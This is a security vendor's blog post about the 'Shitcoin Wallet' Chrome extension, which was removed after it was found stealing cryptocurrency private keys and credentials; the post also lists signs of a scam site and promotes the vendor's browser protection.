A Google Chrome extension named "Shitcoin Wallet" was caught stealing passwords and private keys.
The "Shitcoin Wallet" (Pardon our French, but that's the name of the app. The definition of "Shitcoin" is, in fact, a cryptocurrency of little value) is an app which allows users to manage ETH coins and ERC20 tokens from within their browser. Additionally to the Chrome extension, users can also download a desktop app and control their funds from outside the browser's more endangered environment.
The Chrome extension, which was launched on December 9th, 2019, has already been removed; however, the website remains live where the Windows app is still available to download.
The extension was removed after the finding that it actually contained malicious code, which could cause the following:
- Funds managed directly from the extension are at risk. The extension sends the private information of all wallets created or managed through its interface to a third-party website.
- The extension implements malicious code when users browse to popular cryptocurrency management websites, steals credentials and private keys, and sends them to the same third-party site.
While Guardio blocks malicious sites like this, our research team had a closer look at this site and wanted to share certain things that you should always pay attention to:
- Grammar/ Spelling: The title should be "how it works" or How does it work. Additionally, "ther're" is used for casual writing/texting, and is not something one would expect from a respectful company.
- False links: Not only does the text: "which I will discuss further" seem a little odd placed on a company page, but this text cube doesn't even lead anywhere.
- Suspicious Social Media: When taking a close look at Shitcoin's Twitter account, the followers look like bots. This can be detected by the date they joined Twitter: December 2019 (when the app was launched), and the only content on their account is of the "Shitcoin" app.
But wait, there's more.
Guardio's research team detected another extension by the same people that were exposed before "Shitcoin" called "SAFU Wallet". Hackers like this tend to open new apps with the same code and different appearances every time one gets closed. This means that there will most likely be another attempt for a similar app.
Rest assured that if you use Guardio as your browsing protection, we have removed this extension automatically and will warn you from such malicious apps.